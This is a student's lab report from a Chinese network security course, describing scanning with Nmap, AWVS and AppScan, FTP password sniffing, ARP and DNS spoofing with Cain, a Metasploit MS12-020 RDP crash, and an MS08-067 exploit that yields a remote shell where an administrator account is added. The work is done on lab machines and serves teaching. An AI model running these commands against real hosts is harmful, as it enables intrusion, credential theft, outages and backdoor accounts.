网络安全第一次实验

《网络安全》课程设计实验报告

实验序号：01 实验项目名称：网络安全实验 学 号 实验地点 一、 实验目的及要求 教学目的： 1．Nmap端口扫描：了解扫描工具Nmap，学习Nmap的使用； 2．综合扫描X-Scan：掌握常见漏洞扫描技术原理，了解常用的系统漏洞及防范方法，掌握典型的综合扫描工具。 3．AWVS扫描器扫描web漏洞：了解AWVS——web漏洞扫描工具，学习AWVS的用法。 4．AppScan扫描器web漏洞：了解AppScan扫描器，学习AppScan的用法。 5．御剑Web后台敏感目录扫描：了解御剑后台扫描工具，学习御剑后台扫描工具的使用。 6．FTP连接与密码明文抓取-wires hark：掌握数据嗅探的原理，了解协议封装的过程，掌握典型的嗅探工具的使用。 7．利用arp协议缺陷实现中间人攻击及内网DNS欺骗：利用arp协议缺陷实现中间人攻击获取网络中传输的明文密码，利用中间人攻击实现DNS欺骗攻击。 8．msf利用远程桌面协议RDP拒绝访问漏洞：利用metasploit对开放远程桌面协议的主机进行攻击，使目标主机蓝屏。 9．MS08067利用方法：掌握利用MS08067远程溢出工具发送特殊构造的数据包，使目标主机产生溢出，然后执行shell code代码，打开目标主机端口，使用telnet连接目标端口，获取系统权限。 实验原理： 1、Nmap端口扫描：NMap，也就是Network Mapper，用来扫描网络上计算机开放的网络连接端口。它是网络管理员必用的软件之一，用以评估网络系统安全。正如大多数被用于网络安全的工具，NMap也是不少黑客及骇客（又称脚本小子）爱用的工具。系统管理员可以利用NMap来探测工作环境中未经批准使用的服务器，但是黑客会利用nmap来搜集目标电脑的网络设定，从而计划攻击的方法。 姓 名 指导教师 专业、班 时间 NMap相关命令简单介绍（IP地址仅供参考） 扫描单机端口 nmap 192.168.1.12 扫描IP段端口 nmap 192.168.1.2-200 扫描指定端口 namp -p 21,80,33 192.168.1.12 扫描端口段 nmap -p 1-65535 192.168.1.12 半开连接扫描 nmap -sS 192.168.1.12 全连接扫描 nmap -sT 192.168.1.12 显示banner信息 nmap -sV 192.168.1.12 TCP FIN 扫描Unix系统 nmap -sF 192.168.1.12 TCP NULL 扫描Unix系统 nmap -sN 192.168.1.12 TCP Xmax 扫描Unix系统 nmap -sX 192.168.1.12 扫描原理 全连接扫描（TCP Connect 扫描），通过调用socket函数connect()连接到目标计算机上，完成一次完整的三次握手过程。如果端口处于侦听状态，那么connect()就能成功返回。否则，这个端口不可用，即没有提供服务。优点是稳定可靠，不需要特殊的权限。缺点是扫描方式不隐蔽，服务器日志会记录下大量密集的连接和错误记录，并容易被防火墙发现和屏蔽。 半连接扫描（TCP SYN 扫描），扫描器向目标主机端口发送SYN包。如果应答是RST包，那么说明端口是关闭的；如果应答中包含SYN和ACK包，说明目标端口处于监听状态，再传送一个RST包给目标机从而停止建立连接。由于在SYN扫描时，全连接尚未建立，所以这种技术通常被称为半连接扫描。优点是隐蔽性较全连接扫描好，一般系统对这种半扫描很少记录。缺点是通常构造SYN数据包需要超级用户或者授权用户访问专门的系统调用。 隐蔽扫描技术 隐蔽扫描是指在网络端口扫描过程中隐蔽自身的技术。具体来讲，就是能够不被目标系统的日志机制，扫描监测系统和入侵检测系统扑捉，绕过防火墙二侦测到目标主机运行服务的扫描技术。NMap下的相关扫描方式有TCP FIN扫描、TCP NULL 扫描和TCP Xmax扫描。 TCP FIN 扫描就是TCP Xmas和Null扫描是FIN扫描的两个变种。Xmas扫描打开FIN，URG和PUSH标记，而Null扫描关闭所有标记。这些组合的目的是为了通过对FIN标记数据包的过滤。当一个这种数据包到达一个关闭的端口，数据包会被丢掉，并且返回一个RST数据包。否则，若是打开的端口，数据包只是简单的丢掉（不返回RST）。优点是隐蔽性好。缺点是通常适用于Unix主机，而不适用于Windows。 TCP Xmas和Null扫描是FIN扫描的两个变种。Xmas扫描打开FIN，URG和PUSH标记，而Null扫描关闭所有标记。这些组合的目的是为了通过对FIN标记数据包的过滤。当一个这种数据包到达一个关闭的端口，数据包会被丢掉，并且返回一个RST数据包。否则，若是打开的端口，数据包只是简单的丢掉（不返回RST）。 2、利用X-Scan工具进行： 漏洞扫描：IPC、RPC、POP3、FTP、TELNET、WEB 暴力破解：FTP、POP3、HTTP 3、AWVS扫描器扫描web漏洞：WVS(Web Vulnerability Scanner)是一个自动化的Web应用程序安全测试工具，它可以扫描任何可通过Web浏览器访问的和遵循HTTP/HTTPS规则的Web站点和Web应用程序。适用于任何中小型和大型企业和其它人员的Web网站。WVS可以通过检查SQL注入攻击漏洞、跨站脚本攻击漏洞等来审核Web应用程序的安全性。 它可以扫描任何可通过Web浏览器访问的和遵循HTTP/HTTPS规则的Web站点和Web应用程序。 AWVS功能介绍 WebScanner，核心功能，Web安全漏洞扫描 Site Crawler，爬虫功能，遍历站点目录结构 Target Finder，端口扫描，找出web服务器，80,443 Subdomain Scanner，子域名扫描器，利用DNS查询 Blind SQL Injector，盲注工具 HTTP Editor，http协议数据包编辑器 HTTP Sniffer，HTTP协议嗅探器 HTTP Fuzzer，模糊测试工具 Authentication Tester，Web认证破解工具 4、AppScan扫描器web漏洞：Rational AppScan（简称 AppScan）其实是一个产品家族，包括众多的应用安全扫描产品，从开发阶段的源代码扫描的 AppScan source edition，到针对 Web 应用进行快速扫描的 AppScan standard edition，以及进行安全管理和汇总整合的 AppScan enterprise Edition 等。我们经常说的 AppScan 就是指的桌面版本的 AppScan，即 AppScan standard edition。其安装在 Windows 操作系统上，可以对网站等 Web 应用进行自动化的应用安全扫描和测试。 AppScan 工作原理小结如下： 通过搜索（爬行）发现整个 Web 应用结构 根据分析，发送修改的 HTTP Request 进行攻击尝试（扫描规则库） 通过对于 Respone 的分析验证是否存在安全漏洞 5、御剑Web后台敏感目录扫描：御剑扫描工具主要用来扫描目标站点的敏感目录，如后台管理页面，cms类型以及版本等。简单，易用。 6、FTP连接与密码明文抓取-wireshark：FTP 是File Transfer Protocol（文件传输协议）的英文简称，而中文简称为“文传协议”。用于Internet上的控制文件的双向传输。同时，它也是一个应用程序（Application）。基于不同的操作系统有不同的FTP应用程序，而所有这些应用程序都遵守同一种协议以传输文件。在FTP的使用当中，用户经常遇到两个概念：”下载”（Download）和”上传”（Upload）。”下载”文件就是从远程主机拷贝文件至自己的计算机上；”上传”文件就是将文件从自己的计算机中拷贝至远程主机上。用Internet语言来说，用户可通过客户机程序向（从）远程主机上传（下载）文件。Wireshark（前称Ethereal）是一个网络封包分析软件。网络封包分析软件的功能是撷取网络封包，并尽可能显示出最为详细的网络封包资料。Wireshark使用WinPCAP作为接口，直接与网卡进行数据报文交换。 7、利用arp协议缺陷实现中间人攻击及内网DNS欺骗：ARP地址解析协议，即ARP（Address Resolution Protocol），是根据IP地址获取物理地址的一个TCP/IP协议。主机发送信息时将包含目标IP地址的ARP请求广播到网络上的所有主机，并接收返回消息，以此确定目标的物理地址；收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间，下次请求时直接查询ARP缓存以节约资源。ARP常用命令：arp -a或arp –g：用于查看缓存中的所有项目，arp -a ip：如果有多个网卡，那么使用arp -a加上接口的IP地址，就可以只显示与该接口相关的ARP缓存项目，arp -d ip：使用该命令能够人工删除一个静态项目。ARP协议缺陷：地址解析协议是建立在网络中各个主机互相信任的基础上的，它的诞生使得网络能够更加高效的运行，但其本身也存在缺陷：ARP地址转换表是依赖于计算机中高速缓冲存储器动态更新的，而高速缓冲存储器的更新是受到更新周期的的，只保存最近使用的地址的映射关系表项，这使得攻击者有了可乘之机，可以在高速缓冲存储器更新表项之前修改地址转换表，实现攻击。ARP请求为广播形式发送的，网络上的主机可以自主发送ARP应答消息，并且当其他主机收到应答报文时不会检测该报文的真实性就将其记录在本地的MAC地址转换表，将最近收到的ARP消息纪录到表单中，而没有验证报文的真实性，这样攻击者就可以向目标主机发送伪ARP应答报文，从而篡改本地的MAC地址表。ARP欺骗可以导致目标计算机与网关通信失败，更会导致通信重定向，所有的数据都会通过攻击者的机器，因此存在极大的安全隐患。这样就可以实现中间人攻击。DNS：域名系统(Domain Name System，DNS)是一个将Domain Name和IP Address进行互相映射的Distributed Database. DNS是网络应用的基础设施，它的安全性对于互联网的安全有着举足轻重的影响。但是由于DNS Protocol在自身设计方面存在缺陷，安全保护和认证机制不健全，造成DNS自身存在较多安全隐患，导致其很容易遭受攻击。Client的DNS查询请求和DNS Server的应答数据包是依靠DNS报文的ID标识来相互对应的。在进行域名解析时，Client首先用特定的ID号向DNS Server发送域名解析数据包，这个ID是随机产生的。DNS Server找到结果后使用此ID给Client发送应答数据包。Client接收到应答包后，将接收到的ID与请求包的ID对比，如果相同则说明接收到的数据包是自己所需要的，如果不同就丢弃此应答包。DNS 欺骗攻击原理DNS欺骗，本质上类似于Arp欺骗，都是欺骗DNS缓存。但是DNS缓存欺骗和ARP缓存欺骗有区别，在arp缓存欺骗过程中，arp协议没有任何认证机制，因此攻击者只要构造假的arp回应数据包，就能够欺骗成功。但是在DNS协议中，每个DNS 查询请求，都有唯一一个查询ID标识,而DNS回应包中，会包含该DNS查询请求ID，这是DNS协议基本的认证机制。因此要想实现DNS欺骗，在构造的虚假DNS回应数据包中，就需要事先知道DNS查询请求ID。这就需要有途径能够劫持DNS查询会话，这也是实现DNS欺骗的前提条件。在DNS的解析体系结构中，应用缓存技术的地方主要有PC客户端以及客户端IP地址中指定的首选DNS服务器（中国Internet环境中，往往是运营商提供这个服务。例如202.106.0.20是北京联通提供DNS解析服务的服务器地址）。在实际攻击中，最容易实现的攻击场景是在内网实现对DNS客户端的缓存欺骗。在本实验中，我们构造的在一个交换内网中发生的场景，攻击者首先通过arp欺骗实现中间人攻击，（达到能够劫持DNS查询会话的目的）。然后在篡改DNS的回应记录（利用cain集成的DNS欺骗功能），从而实现欺骗客户端DNS缓存。CAIN是一个WINDOWS平台上的破解各种密码，嗅探各种数据信息，实现各种中间人攻击的软件。 8、msf利用远程桌面协议RDP拒绝访问漏洞：远程桌面协议（RDP, Remote Desktop Protocol）是一个多通道（multi-channel）的协议，让客户端连上服务器。 Windows在处理某些RDP报文时Terminal Server 存在错误，可被利用造成服务停止响应。 9、MS08067利用方法：MS08-067远程溢出漏洞的原因是由于Windows系统中RPC存在缺陷造成的，Windows系统的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞，远程攻击者可以通过发送恶意的RPC请求触发这个溢出，如果受影响的系统收到了特制伪造的RPC请求，可能允许远程执行代码，导致完全入侵用户系统，以SYSTEM权限执行任意指令并获取数据，并获取对该系统的控制权，造成系统失窃及系统崩溃等严重问题。 二、实验设备（环境）及要求 实验环境：Windows 2003虚拟机，Linux虚拟机。 实验工具： 1．C:\\实验工具集\\02主机安全\\01信息收集 2．C:\\实验工具集\\02主机安全\\01信息收集 3．C:\\实验工具集\\01_WEB安全\\01_web扫描技术\\ 4．C:\\实验工具集\\01_WEB安全\\01_web扫描技术\\ 5．C:\\实验工具集\\01_WEB安全\\01_web扫描技术\\ 6．C:\\实验工具集\\06网络与无线安全\\02嗅探与欺骗 7．3台靶机ip分别为192.168.1.3，192.168.1.4,攻击机为192.168.1.2、192.168.1.4搭建了ftp服务器，账户为：administrator，密码为Simplexue123、192.168.1.4配置了 dns服务；软件：cain； 8．Linux虚拟机； 9．C:\oos\\ MS08067利用方法。 三、实验内容与步骤 实验一（nmap端口扫描）： 打开zenmap GUI，创建一个扫描窗口，输入地址192.168.1.3，选择扫描方式regular scan，点击扫描，如图。 打开命令行，输入nmap查看使用方法，输入nmap 192.168.1.3进行Regular Scan。 输入nmap -p 21,22,80,33 192.168.1.3，进行特定端口查询： 输入nmap -oX 2014301500274.xml 192.168.1.3将扫描结果以xml的形式输出： 实验二（综合扫描X-Scan）： 打开xscan_gui.exe，进行扫描参数设置 设置完成后，开始扫描 然后在地址栏输入ftp://192.168.1.3，验证获取的FTP弱口令，结果如下。 实验三（AWVS扫描器扫描web漏洞）： 打开站点扫描向导，输入http://192.168.1.3:8001，一直选择默认，然后进行扫描，结果如下。 接下来点击“tools”中的“Site Crawler”选项，点击“Start”，进行站点爬行。 继续点击Target Finder，端口扫描，找出web服务器，8001，8080。 实验四（AppScan扫描器web漏洞）： 打开AppScan软件，根据扫描向导设置好后进行扫描。 将扫描结果保存 实验五（御剑Web后台敏感目录扫描）： 打开御剑后台扫描工具，在域名的框格中输入目标站点的url（http://192.168.1.3:8001），点击开始扫描。结果如下 发现扫描结果中的【HTTP响应】值为200，每个页面都是可以访问的。双击其中一条连接【http://192.168.1.3:8001 /index.asp】打开主站点。 双击链接【http://192.168.1.3:8001 /admin/Login.asp】，进入后台管理页面。 双击链接【http://192.168.1.3:8001 /FCKeditor/_whatsnew.html】，查看该站点的编辑器类型为FCK及其版本号 实验六（FTP连接与密码明文抓取-wireshark）： 首先设置wireshark抓包参数，然后选择操作的额网络适配器，最后开始捕获数据包。 接下来开始建立连接，在地址栏输入“ftp:\\192.168.1.3”进行登陆。 然后返回wireshark界面中，找到登陆的帐号（test）和密码(123456)。 实验七（利用arp协议缺陷实现中间人攻击及内网DNS欺骗）： 切换到ip为192.168.1.2的服务器中，选择点击桌面【tools】目录下的【利用arp协议缺陷实现中间人嗅探网络明文】文件中的【Cain.exe】启动cain软件。点击【configure】选项，选择网卡，选择ip地址为（192.168.1.2）的那块网卡，选择之后点击确定。选择好网卡之后，点击start/stop sniffer光标开启sniffer功能，进入sniffer选项卡，选择下方的hosts选项，单击空白处，选择scan mac address，进入扫描。选择了scan mac address后，选择扫描的网段，选择all hosts in my subnet。点击ok，进行扫描。将本网段除了本机外的其他机器全部扫描出来了。可以看到192.168.1.4和192.168.1.3两个ip地址。如果扫出其他ip地址，将其删除。只留下（192.168.1.3）和（192.168.1.4）两个ip及其mac地址。 扫描出mac地址后，选择下方的arp选项，进入arp选项页面。单击（＋）添加目标地址，分别选择（192.168.1.3）和（192.168.1.4）。点击ok。使用arp –a 命令查看本地缓冲中的项目。分别在（192.168.1.3）和（192.168.1.4）两台机器上查看。如果没有出现，有些条目没有出现，可以切换到对应的系统使用ping 命令去ping对方的ip地址。在使用arp –a就可以了。同时由于mac地址是唯一的。实验中的mac地址与文档中的截图中mac地址不一致，是正常的。选择好目标后，点击（start/stop arp）按钮开启arp。开启arp后，在分别进入（192.168.1.3）和（192.168.1.4）使用arp命令查看。发现起ip对应的mac地址已经发生了改变，与图7所示不一致。与在（192.168.1.3）上看（192.168.1.4）的mac地址是原本（192.168.1.2）的，在（192.168.1.4）上看（192.168.1.3）的mac地址也是（192.168.1.2）的，说明arp欺骗已经成功。 切换到（192.168.1.3）系统中，使用资源管理器连接在（192.168.1.4）搭建的ftp服务器。输入正确的账户名administrator，密码Simplexue123。点击登陆。输入正确的用户名密码之后，即可进入ftp服务器中。再次切换到（192.168.1.2）系统中。选择cain下方的passwords选项页面。选择左侧的ftp选项。即可看到刚刚在进入ftp时输入的ftp的账号密码。其中有一条anonymous，说明ftp允许匿名登陆。 在（192.168.1.4）中搭建了dns服务器,对域名做了解析。www.shiyanbar.com 对应的解析ip为192.168.100.100(此步骤已经完成,可跳过)。在（192.168.1.3）和（192.168.1.4）上都需要进行指定。将dns地址指向192.168.1.4。注意：需将192.168.1.3的两块网卡都进行dns指定，否则DNS欺骗失败。首先切换到（192.168.1.2）中进入cain，点击（start/stop arp）按钮关闭arp。再切换到192.168.1.3中，进入cmd命令行使用nslookup -qt=A www.shiyanbar.com 192.168.1.4查询。切换到（192.168.1.2）中，进入cain软件中，选择下方的arp页面，选择左侧的ARP-DNS选项。在点击上方的（＋）添加一个目标，将网址解析的ip改为1.1.1.1，点击ok。 点击ok 后页面可以看到刚刚设置的解析。切换到（192.168.1.3）系统中，再次查询。 实验八（msf利用远程桌面协议RDP拒绝访问漏洞）： 先打开终端，输入命令” nmap -sS -Pn -A 192.168.1.3”,扫描目标主机,发现开着33端口。 输入msfconsole命令。 在msf下输入命令“search ms12_020”，用来查找远程桌面相关exploit参数。输入命令“use auxiliary/dos/windows/rdp/ms12_020_maxchannelids”来定义要扫描samba的版本所用到的exploits参数。输入命令“show options”查看需要配置的参数。输入命令“set RHOST 192.168.1.3”设置远程主机的IP地址。输入命令“exploit”进行攻击。 发现目标主机蓝屏重启了。 实验九（MS08067利用方法）： 打开命令行界面，输入”cd C:\ools\\MS08067利用方法”，继续输入命令”MS08067.exe”,显示工具使用方法。 首先输入命令“MS08067.exe 192.168.1.3”,工具向远程主机192.168.1.3发送一串特殊构造得数据包，使目标主机产生内存益处，程序跳转到shellcode代码处执行，shellcode代码在目标主机上开启4444端口，等待连接。输入命令“telnet 192.168.1.3 4444”。成功连接目标主机，输入命令“ipconfig”,查看远程主机IP信息。输入命令“net user aaa 123456 /add”在远程主机上添加帐户aaa，密码：123456。输入命令“net localgroup administrators aaa /add”把帐户aaa添加到管理员组。输入命令“netstat -an”查看远程主机开放端口，发现33已经打开。输入命令“net user aaa”查看帐户aaa是否已经输入管理员组。 单击“开始”-〉”运行“->输入命令”mstsc“,打开远程桌面窗口。输入账号“aaa“和密码”123456“，登陆目标主机。使用aaa账号登陆成功。 六、教师评语 签名： 日期： 成绩